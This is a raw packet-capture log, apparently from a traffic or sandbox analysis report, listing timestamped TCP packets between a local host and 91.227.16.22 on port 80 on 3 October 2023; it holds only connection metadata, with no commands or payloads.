                                                                                                        Oct 3, 2023 18:02:39.573767900 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573786974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573798895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573811054 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.573838949 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.573852062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573872089 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573893070 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573904037 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573916912 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.573931932 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573957920 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.573967934 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.573982000 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574007988 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574012995 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574049950 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574052095 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574065924 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574090958 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574107885 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574146032 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574162006 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574173927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574186087 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574189901 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574209929 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574250937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574261904 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574273109 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574306011 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574310064 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574342012 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574348927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574366093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574404001 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574438095 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574497938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574505091 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574573040 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574616909 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574625015 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574668884 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574717045 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574726105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574754953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574820042 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574825048 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574915886 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574928045 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574940920 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574959993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.574963093 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.574995041 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.575005054 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575025082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575036049 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575053930 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.575077057 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.575088978 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575103998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575130939 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575146914 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.575159073 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.575201988 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.590361118 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.595293045 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595315933 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595329046 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595345020 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595361948 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595372915 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595437050 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595439911 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.595452070 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595467091 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595483065 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.595494986 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.595504045 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.595542908 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.608319044 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.639795065 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.639822960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.639841080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.639858961 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.639873028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.640012980 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.640012980 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.667228937 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.668900013 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.759648085 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.759759903 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.759773970 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.759866953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.759923935 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.759923935 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.759967089 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760133028 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760186911 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.760231018 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760296106 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760345936 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.760375023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760503054 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760554075 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.760555029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760605097 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760652065 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.760787010 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760832071 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760883093 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.760895967 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760945082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.760992050 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761002064 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761065960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761115074 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761156082 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761276960 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761337996 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761348009 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761399984 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761461020 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761481047 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761538029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761596918 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761607885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761639118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761684895 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761724949 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761869907 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.761915922 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.761972904 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762197018 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762243032 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762299061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762392998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762438059 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762475014 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762543917 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762590885 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762624979 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762654066 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762732983 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762739897 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762758970 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762810946 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762825012 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762892008 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.762945890 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.762948036 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763008118 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763052940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763078928 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763128996 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763175011 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763191938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763235092 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763283014 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763314962 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763366938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763411045 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763441086 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763493061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763539076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763542891 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763638973 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763681889 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763684034 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763736963 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.763783932 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.763858080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764301062 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764383078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764414072 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.764472961 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764519930 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.764571905 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764672995 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764723063 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.764724016 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764817953 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764863968 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.764893055 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.764959097 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765006065 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765007019 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765037060 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765083075 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765172005 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765275002 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765326023 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765358925 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765460014 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765507936 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765538931 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765614986 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765661955 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765712976 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765815020 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765858889 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.765909910 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.765974998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766021967 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766072989 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766114950 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766163111 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766202927 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766267061 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766309977 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766335964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766365051 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766408920 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766457081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766520977 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766566038 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766570091 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766623974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766639948 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766669989 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766721964 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766767025 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766802073 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766845942 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766889095 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.766915083 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.766958952 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767000914 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767041922 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767100096 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767147064 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767173052 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767254114 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767296076 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767306089 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767371893 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767416954 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767443895 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767509937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767560005 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767585993 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767621994 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767635107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767678022 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767710924 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767729998 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767771006 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767839909 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767913103 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.767956018 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.767991066 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768054008 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768099070 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768138885 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768213987 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768256903 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768292904 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768340111 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768383026 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768414974 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768523932 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768568039 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768608093 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768701077 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768747091 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768785954 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768908978 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.768954039 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.768985033 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769058943 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769103050 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.769159079 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769263029 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769305944 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.769334078 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769426107 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769469976 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.769498110 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769567013 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769610882 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.769650936 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769781113 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769824982 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.769828081 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769927025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.769969940 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770009995 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770108938 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770152092 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770191908 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770278931 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770325899 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770354033 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770458937 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770500898 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770548105 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770600080 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770646095 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770651102 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770735025 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770781040 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770807981 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770875931 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.770920038 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.770972967 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771075010 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771119118 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.771161079 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771260023 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771302938 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.771339893 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771401882 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771446943 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.771483898 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771588087 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771631956 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.771658897 CEST804982891.227.16.22192.168.2.3
                                                                                                        Oct 3, 2023 18:02:39.771859884 CEST4982880192.168.2.391.227.16.22
                                                                                                        Oct 3, 2023 18:02:39.771900892 CEST804982891.227.16.22192.168.2.3
